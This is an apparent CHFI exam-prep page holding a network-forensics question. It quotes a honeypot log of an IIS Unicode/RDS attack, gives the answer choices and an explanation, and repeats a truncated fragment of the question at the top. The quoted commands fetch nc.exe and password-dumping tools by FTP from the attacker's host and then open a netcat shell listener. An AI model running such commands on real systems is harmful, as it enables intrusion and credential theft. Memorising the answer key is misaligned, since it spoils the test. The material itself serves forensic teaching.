The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File It is a local exploit where the attacker logs in using username johna2k There are two attackers on the system - johna2k and haxedj00 The attack is a remote exploit and the hacker downloads three files The attacker is unsuccessful in spawning a shell as he has specified a high end UDP por

EC-Council: Computer Hacking Forensic Investigator(CHFI-V10)

Module 8 : Network Forensics

Questions available : 133 You are not logged in.
Please Login for track your learning progress

Q. No: 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |

Go to Question No.

Question No 0

If you want to share the link of this question, please click here to "Copy Question Link" and share that generated link. Link from URL may change in future.

Bookmark this Question

QID: 823

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom""cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

A: It is a local exploit where the attacker logs in using username johna2k

B: There are two attackers on the system - johna2k and haxedj00

C: The attack is a remote exploit and the hacker downloads three files

D: The attacker is unsuccessful in spawning a shell as he has specified a high end UDP por

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

WELCOME TO ONLINE EXAM PREPARATION SYSTEM

Join Online Exam

Certification Examinations